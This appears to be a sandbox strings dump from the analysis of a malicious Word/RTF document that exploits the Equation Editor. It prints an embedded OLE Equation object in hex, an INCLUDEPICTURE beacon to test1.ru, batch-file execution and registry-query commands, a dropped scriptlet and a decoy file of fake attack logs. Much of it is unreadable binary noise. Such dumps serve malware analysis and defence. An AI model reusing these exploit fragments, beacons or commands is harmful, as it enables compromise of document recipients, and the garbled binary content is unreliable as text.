Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Wingdings

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 2

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 3

Unicode based on Runtime Data (WINWORD.EXE )

Wj>Jf]=Y`YE~}q=j]u3m[tOx?nBm,fbk(x};q|.QK2h^ZC`[GeD~Yq~1CT!qb

Ansi based on Dropped File (~WRC0000.tmp)

Wl$(ELrc#W4*qAv/"K}A]4 )Bqu>V!v}:NCV?30[^ 0f"Bu4B<Yv}R2^^5"wDOIP[ta%|C-]hwICGC"ZWA~T_{:iZ=Pirs;!#

Ansi based on Dropped File (~WRC0000.tmp)

word/glossary/settings.xmlPK-!^`word/settings.xmlPK-!l~5%word/glossary/_rels/document.xml.relsPK-!GVm|dword/glossary/document.xmlPK-!(^=Oword/stylesWithEffects.xmlPK-!712qB'docProps/core.xmlPK-!:)word/webSettings.xmlPK-!klV+docProps/app.xmlPK-!^-word/glossary/fontTable.xmlPK-!N.0word/glossary/webSettings.xmlPK-!)H w>#k1word/glossary/stylesWithEffects.xmlPK-!$;9word/glossary/styles.xmlPK-!MAword/fontTable.xmlPK-!N#;m:Cword/styles.xmlPKJ

Ansi based on Dropped File (~WRC0000.tmp)

word/glossary/settings.xmlUmO0>iIJaSD?Io:;_s

Ansi based on Dropped File (~WRC0000.tmp)

Word2o1o

Ansi based on Image Processing (screen_0.png)

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

WordPerfect

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

WordPerfect Document

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

WordPerfect Text

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

www.dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

wwwwh

Ansi based on Dropped File (exe.exe.634531026)

wwwwww

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwwp

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

xd>Gx[d3n:Z&P(}*1j>]:|LAn"Vn0f+"U*Sp8R<[?Rv]H"C ;Aki Umq63 |8W-<:$TdX|/aSM<9d._wPK!^`word/settings.xmlUN@}$HPJ"Y7_Y7F

Ansi based on Dropped File (~WRC0000.tmp)

x}rxwr:\TZaG*y8IjbRc|XI

Ansi based on Dropped File (~WRC0000.tmp)

y,9`eXt' !mxW^]710}NaXC+_~KdtOV_<)!SN;J8ZL1T=_92><LU5GH[u+h$]'Ewb]8tRTJ_y&ZQi]Qh]Q5uEGWxLW5&z7P}/RJe:R]^j[EGr-SNO'EKul*uOAayPWXM`rxQYSFrM<nRM6y'o"{pOLi!.+ N#S7W \]V(`L0n|c()\'qd_VTz{%}3Vz3BL '"9<S/v<J@!dBvJF`XD&;,bY5[yPPgLsI!hy<zGqGV@J!!><&AGmaf-T7mzDTw*MVouP5}TTQY'E7FCy#`9L =UDvoFER(dBNy#J$T,!!oP?@7Fu'vEeFP y@!;Nw*j,*XXz

Ansi based on Dropped File (~WRC0000.tmp)

Y.9PJ3C;S

Ansi based on Dropped File (~WRC0000.tmp)

ymbol . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

YPQkV5+<L5 > d#J7Jxb6\l;+(>(Z83&auYh0Z1mMys!"N$I,SyeZ.6,x7sGEb%kf&1I|a8xB@a"\xY^&_~X~iWzIZI;P/X;#WJ1eeZ6%=I1p:C@d

Ansi based on Dropped File (~WRC0000.tmp)

Z-OeTr;-#%

Ansi based on Dropped File (~WRC0000.tmp)

z[,P/B

Ansi based on Dropped File (~WRC0000.tmp)

ZBome

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

ze:Changes typesize directly - without using size definitions

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ZoomDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

ZPh{jzBVBT^y;6VGu_PK!

Ansi based on Dropped File (decoy.doc)

zyxwvutsrqponmlkjihg

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ZYXWVUTSRQPONMLKJIHG

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

{$DvxrR@^V?=u]V6))+`{`EVNzx%cdR}`e;tg]T5

Ansi based on Dropped File (~WRC0000.tmp)

{71358FC1-E43B-11D1-A17F-00A0C90AB50F}

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

{\field{\*\fldinst{INCLUDEPICTURE "http://test1.ru/newbuild/t.php?stats=send&thread=0" MERGEFORMAT \\d \\w0001 \\h0001 \\pm1 \\px0 \\py0 \\pw0}}}}

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

{\rt{\pict\jpegblip\picw24\pich24 ffd8ffe112914578696600004d4d002a000000080007011200030000000100010000011a00050000000100000062011b0005000000010000006a012800030000000100020000013100020000001c0000007201320002000000140000008e8769000400000001000000a4000000d0000afc8000002710000afc800000271041646f62652050686f746f73686f70204353352057696e646f777300323031363a31313a32322031353a34343a31300000000003a001000300000001ffff0000a002000400000001000003b6a003000400000001000002580000000000000006010300030000000100060000011a0005000000010000011e011b0005000000010000012601280003000000010002000002010004000000010000012e02020004000000010000115b0000000000000048000000010000004800000001ffd8ffed000c41646f62655f434d0001ffee000e41646f626500648000000001ffdb0084000c08080809080c09090c110b0a0b11150f0c0c0f1518131315131318110c0c0c0c0c0c110c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c010d0b0b0d0e0d100e0e10140e0e0e14140e0e0e0e14110c0c0c0c0c11110c0c0c0c0c0c110c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0cffc0001108006500a003012200021

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

}_Fin.J

Ansi based on Image Processing (screen_6.png)

}numbernfigureversionhigh

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ

Ansi based on Dropped File (~WRC0000.tmp)

~x`jjU <XPU 6oF~x#(5A!g&V,rj,+u8,~^E4#ohxCo

Ansi based on Dropped File (~WRC0000.tmp)

~x`jjU <XPU 6ox#(5A!g&V,rj,+WQ"G#8

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU 6<+x(5@aG&N,vj,'`&8#oh&w?d<&4*[*[o#]vMST';@5:k&017q8M

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU 6sp^|<us2p$*pJlD}Vt@`!T?($%TxOTN/1Sa{iy;h'5h2]EvCCPc>xCG^T>sx8bUD?P/k@+TnBc?Wymn:+NOxmQ|cHwq$>`hbg-`z7xp3d>bW9uZc&?q-\&wXk*U>>8V'c?';'kAY_(S1Go-

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU |

Ansi based on Dropped File (~WRC0000.tmp)

~xM`x@ly(AU&pPqv&Pj7NMPK&J#osx@3@88aG#p'[JM7To

Ansi based on Dropped File (~WRC0000.tmp)

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (WINWORD.EXE )

!"#$%'()*+,-0Root EntryFOz21TableWordDocument.SummaryInformation(DocumentSummaryInformation8&CompObjr

Ansi based on Dropped File (decoy.doc)

"http://cps.root-x1.letsencrypt.org0<

Ansi based on PCAP Processing (network.pcap)

"http://ocsp.int-x3.letsencrypt.org0/

Ansi based on PCAP Processing (network.pcap)

#http://cert.int-x3.letsencrypt.org/0/

Ansi based on PCAP Processing (network.pcap)

$^<wr=ocwwww6;K}=#w>\&!xf.p/qOXkp8Hjgu=O]V<4%^Tc7PK-!+:P[Content_Types].xmlPK-!N_rels/.relsPK-!-t:M0word/_rels/document.xml.relsPK-!word/document.xmlPK-!0C)word/theme/theme1.xmlPK-!-

Ansi based on Dropped File (~WRC0000.tmp)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

&http://isrg.trustid.ocsp.identrust.com0;

Ansi based on PCAP Processing (network.pcap)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Dropped File (decoy.doc)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Dropped File (decoy.doc)

)!crp-bgandfPyPenqzLeq5$d"fzR_Xv=Z[jY<;9+ZJ2X

Ansi based on Dropped File (~WRC0000.tmp)

+http://crl.identrust.com/DSTROOTCAX3CRL.crl0

Ansi based on PCAP Processing (network.pcap)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!Tctheme/theme/theme1.xmlPK-!

Ansi based on Dropped File (decoy.doc)

----------------------------Cisco Catalyst Log Entry 03.13.2018 EOF----------------------------

Ansi based on Dropped File (decoy.doc)

----------------------------Cisco Catalyst Log Entry 03.13.2018----------------------------

Ansi based on Dropped File (decoy.doc)

-v"YmR04hYW8hGyfz',I9}a])c~wrr;@P+-PuQPVgU

Ansi based on Dropped File (~WRC0000.tmp)

. . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

. . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.-;J+;F>hXdB%?y\MCG-ayVf&eBn(5&NI`V7rb*<GqGO,68M7p;PU 6X+fT=v&Pj7NxX'j,'u8M#8M#8M

Ansi based on Dropped File (~WRC0000.tmp)

.\-/n*x]+8lq!P1lf><DX,|8h((6|e_,\7}V1}D>}<=G>UgJ&tTa

Ansi based on Dropped File (~WRC0000.tmp)

.C. Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.C. Greek . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

/C %TEMP%\TaSk.BaT

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/http://apps.identrust.com/roots/dstrootcax3.p7c0

Ansi based on PCAP Processing (network.pcap)

/K %TEMP%\2nd.bat

Ansi based on Process Commandline (cmd.exe)

/n "%USERPROFILE%\Desktop\New Microsoft Word Document.docx"

Ansi based on Process Commandline (WINWORD.EXE)

/n "C:\5635DF453843.doc"

Ansi based on Process Commandline (WINWORD.EXE)

0Thgdmh}0Qf{?gdm,1h. A!"R#n$n%

Ansi based on Dropped File (decoy.doc)

0u:o@P]H'!3}e'*n+i Z z

Ansi based on Dropped File (~WRC0000.tmp)

0Your equation requires too many different fonts.+Internal Error #%d. Contact Design Science.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

1WsH=O^QN+T)Ep!BTETxBEG}h\fq/U~&e~cMc,9&J!.u.RB>B.A|p^owJH{.6K2/lS8qQ

Ansi based on Dropped File (~WRC0000.tmp)

2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe

Ansi based on Dropped File (~WRC0000.tmp)

42@J!k&!#ayV+#MeBn(5&NunX-U=FUM8UP x4x@74x@2xXlm(5*_M]/#7PSvtW8PcRG`#8M#8M#p'[JM7To_hAY@a)

Ansi based on Dropped File (~WRC0000.tmp)

7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf

Ansi based on Dropped File (~WRC0000.tmp)

8cT;?t.bt{c9GK$+0?C~Se6X~.!;[rTu!]19X"|PJf]M

Ansi based on Dropped File (~WRC0000.tmp)

8PK!Tctheme/theme/theme1.xmlY7w}L~VLha@7q2f=h!$WiUV(R^TUW*UQUWXg2/,+*]iw|9g>{+N8aq-*GlLi63~pmGo

Ansi based on Dropped File (decoy.doc)

9;^f&5ZDZF{J7 @D4x#@74x#@2x#XdmZoHBU]7i+

Ansi based on Dropped File (~WRC0000.tmp)

9AMFPioKBJ5x#@74x#@74x#@2x#XdmZo,ToHBWoox#(nR,rj,+~RK7%q8#8

Ansi based on Dropped File (~WRC0000.tmp)

:._---_-

Ansi based on Image Processing (screen_3.png)

;:5A-;@5V)Iqj&x4x@74x@2xXlm(5*[JPU 6o]vMSR,vjR,M+q<G#8M

Ansi based on Dropped File (~WRC0000.tmp)

</registration>

Ansi based on Dropped File (inteldriverupd1.sct)

</script>

Ansi based on Dropped File (inteldriverupd1.sct)

</scriptlet>

Ansi based on Dropped File (inteldriverupd1.sct)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Dropped File (decoy.doc)

<?XML version="1.0"?>

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (decoy.doc)

<registration

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Dropped File (decoy.doc)

>/1.Ubjbjnn.aa0JLLLLLL:LLaJJ`Oz6w0&@LLmg:

Ansi based on Dropped File (decoy.doc)

@%SystemRoot%\system32\packager.dll,-2000

Unicode based on Runtime Data (WINWORD.EXE )

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

@LT\dFijiNormal.dotmFiji17Microsoft Office Word@0@Bu@<z;.+,0hp|

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 30.49.48.1, Tuesday, March 13, 2018 19:54:47

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:11:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:13:44

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:21:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:30:20

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:36:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:38:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:59:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:13:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:21:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:25:03

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:32:32

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:37:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:42:23

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:05

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:31

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:58:34

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:23:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:40:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:53:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:11:29

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:13:41

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:44:57

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:50:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:57:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:16:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:22:39

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:23:36

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:28:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:32:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:42:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:44:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:53:49

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:56:15

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 20:02:37

Ansi based on Dropped File (decoy.doc)

[DoS Attack: TCP/UDP Chargen] from source: 184.105.139.117, port 15283, Tuesday, March 13, 2018 19:58:53

Ansi based on Dropped File (decoy.doc)

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FE78C40][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FEDA6C0][O00000000]*C:\5635DF453843.doc

Unicode based on Runtime Data (WINWORD.EXE )

\bin2633OLE2Link

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\layout.inf

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath\bin-00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000039B1A0B1020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000C096012E4C8AD30103000000000300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000690000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF0500000006000000070000000800000009000000FEFFFFFF0B000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000